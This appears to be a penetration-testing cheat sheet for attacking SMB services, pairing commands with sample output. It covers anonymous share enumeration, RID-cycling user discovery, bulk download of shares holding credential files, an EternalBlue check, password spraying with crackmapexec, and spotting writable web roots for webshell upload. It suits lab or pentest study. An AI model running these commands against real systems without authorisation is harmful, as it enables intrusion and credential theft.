SMB (139/445)

Null session enum

Comprehensive SMB enum — Users, shares, policies, groups

enum4linux -a $IP
Example Output
enum4linux -a 10.10.10.5
[+] Users:
administrator, guest, krbtgt, john.smith
[+] Shares:
IPC$, ADMIN$, C$, Backups, Users

List shares (null)

Anonymous share listing — Find accessible shares

smbclient -L //$IP -N
Example Output
smbclient -L //10.10.10.5 -N
  Sharename  Type  Comment
  --------   ----  -------
  Backups    Disk  Company backups
  Users      Disk  User directories
  ADMIN$     Disk  Remote Admin

List shares (crackmapexec)

Alternative enum — Shows read/write permissions

crackmapexec smb $IP --shares -u '' -p ''
Example Output
crackmapexec smb 10.10.10.5 --shares -u '' -p ''
  Share      Permissions  Remark
  Backups    READ         Company backups
  Users      READ,WRITE   User files
  ADMIN$     NO ACCESS
(READ,WRITE on Users = upload potential)

Connect to shares

Browse each share — Download interesting files

smbclient //$IP/<share> -N
Example Output
smbclient //10.10.10.5/Backups -N
smb: \> ls
  .                  D   0  Jan 01  2024
  old_config.bak     A  1024  Jan 01  2024
  passwords.xlsx     A  2048  Jan 01  2024
smb: \> get passwords.xlsx

Recursive download share

Grab everything — Offline analysis

smbget -R smb://$IP/<share>/
Example Output
smbget -R smb://10.10.10.5/Backups/
Downloaded 15 files
./Backups/IT/credentials.txt
./Backups/HR/employee_list.csv
(Analyze everything offline)

Enumerate users (RID cycling)

Find domain users — Build user list

crackmapexec smb $IP --rid-brute
Example Output
crackmapexec smb 10.10.10.5 --rid-brute
500: CORP\Administrator
501: CORP\Guest
1001: CORP\john.smith
1002: CORP\svc_sql
1003: CORP\admin.backup

Check for EternalBlue

MS17-010 — Instant SYSTEM shell if vuln

nmap --script smb-vuln-ms17-010 -p 445 $IP
Example Output
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Risk factor: HIGH
(Use exploit/windows/smb/ms17_010_eternalblue)

Check SMB version/signing

Version and signing status — SMBv1 = more exploits, no signing = relay

crackmapexec smb $IP
Example Output
crackmapexec smb 10.10.10.5
SMB  10.10.10.5  445  TARGET  [*] Windows 10.0 Build 17763 x64
SMB  10.10.10.5  445  TARGET  [*] SMBv1: False
SMB  10.10.10.5  445  TARGET  [*] Signing: False
(No signing = relay attacks possible)

Brute force with found users

Spray found creds — Password reuse across services

crackmapexec smb $IP -u users.txt -p passwords.txt
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success
SMB [-] corp\admin:Password1
SMB [-] corp\admin:Welcome1
SMB [+] corp\john.smith:Winter2025
(--continue-on-success finds ALL valid combos)

Check for write access

Can you upload files? — Upload to web root or share

smbclient //$IP/<share>
put test.txt
Example Output
smbmap -H 10.10.10.5 -u john -p Password1
  Disk        Permissions  Comment
  ----        -----------  -------
  Backups     READ ONLY
  Users       READ, WRITE  <- can upload!
  wwwroot     READ, WRITE  <- webshell target!
(WRITE on wwwroot = upload PHP shell)